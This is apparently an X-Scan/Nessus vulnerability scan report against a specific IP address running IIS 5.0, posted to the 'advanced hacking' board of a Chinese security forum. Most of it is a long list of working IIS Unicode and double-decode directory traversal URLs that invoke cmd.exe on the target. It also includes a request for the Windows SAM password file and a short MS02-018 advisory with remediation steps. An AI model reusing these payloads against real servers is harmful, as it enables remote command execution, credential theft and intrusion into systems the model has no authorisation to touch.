漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp)
The IIS server appears to have the .HTR ISAPI filter mapped.

At least one remote vulnerability has been discovered for the .HTR
filter. This is detailed in Microsoft Advisory
MS02-018, and gives remote SYSTEM level access to the web server.

It is recommended that, even if you have patched this vulnerability,
you unmap the .HTR extension and any other unused ISAPI extensions
if they are not required for the operation of your site.

Solution :
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.

In addition, you may wish to download and install URLSCAN from the
Microsoft Technet Website. URLSCAN, by default, blocks all requests
for .htr files.

Risk factor : High
CVE_ID : CVE-2002-0071
BUGTRAQ_ID : 4474
NESSUS_ID : 10932
Other references : IAVA:2002-A-0002

警告 www (80/tcp) CGI漏洞: http://66.54.90.74/../../../../../../Scandisk.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/../../../scandisk.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..\..\..\..\..\..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/..\..\..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_mem_bin/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_adm/admin.dll
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_bin/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_bin/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_pvt/author.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/Admin_files/order.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/abczxv.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/bin/scripts/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/bin/scripts/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/catalog.nsf/
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cfdocs/exampleapp/email/getfile.cfm?filename=c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin/../../../../winnt/system32/cmd.exe
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin/..\..\..\..\..\..\winnt
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin/get32.exe
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin/tst.bat
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/default.asp\
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/getfile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_mem_bin/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/iissamples/exair/search/qfullhit.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/iissamples/exair/search/qsumrhit.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/iissamples/issamples/oop/qfullhit.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/iissamples/issamples/oop/qsumrhit.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/index.asp\
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/main.asp\
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/../../../../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/catalog.nsf
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/msadc/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/null.ida
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/robots.txt
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/script/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/../../../../../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/../../cmd.exe
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/../../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/cgi-bin
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/..
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/admin.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/iisadmin/tools/mkilog.exe
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/root.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/iishelp/iis/misc/iirturnh.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/samples/search/qfullhit.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/samples/search/qsumrhit.htw
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/tools/mkilog.exe
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/user.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/WebShop/logs/ck.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/access.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/null.idq
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/log.htm
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/log.txt
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/log.nsf
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/password.log
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/log.html
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/scripts/cmd.exe
警告 www (80/tcp) CGI漏洞: http://66.54.90.74/a.asp/..
提示 www (80/tcp) A web server is running on this port
NESSUS_ID : 10330

提示 www (80/tcp) Nessus was not able to exactly identify this server. It might be:
Microsoft-IIS/5.0 (Windows 2000 server SP4 w/ latest patches [2003-02-05])
The fingerprint differs from these known signatures on 3 point(s)

If you know what this server is and if you are using an up to date version
of this script, please send this signature to www-signatures@nessus.org :
HTM:200:200:200:200:HTM:400:400:400:400:400:400:200:400:400:400:400:405:200:200:200:200:200:200:+++::Microsoft-IIS/5.0
Including these headers:
ETag: "e0ee8756eddc41:b3a"

Try to provide as much information as you can: software & operating
release, sub-version, patch numbers, and specific configuration option,
if any.
NESSUS_ID : 11919

提示 www (80/tcp) The remote web server type is :

Microsoft-IIS/5.0

Solution : You can use urlscan to change reported server for IIS.
NESSUS_ID : 10107

提示 ftp (21/tcp) Maybe the "ftp" service running on this port.

NESSUS_ID : 10330

--------------------------------------------------------------------------------
本报表由网络安全漏洞扫描器"X-Scan"生成.

地主发表时间: 05-02-05 12:37

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写：NetDemon

粤ICP备05087286号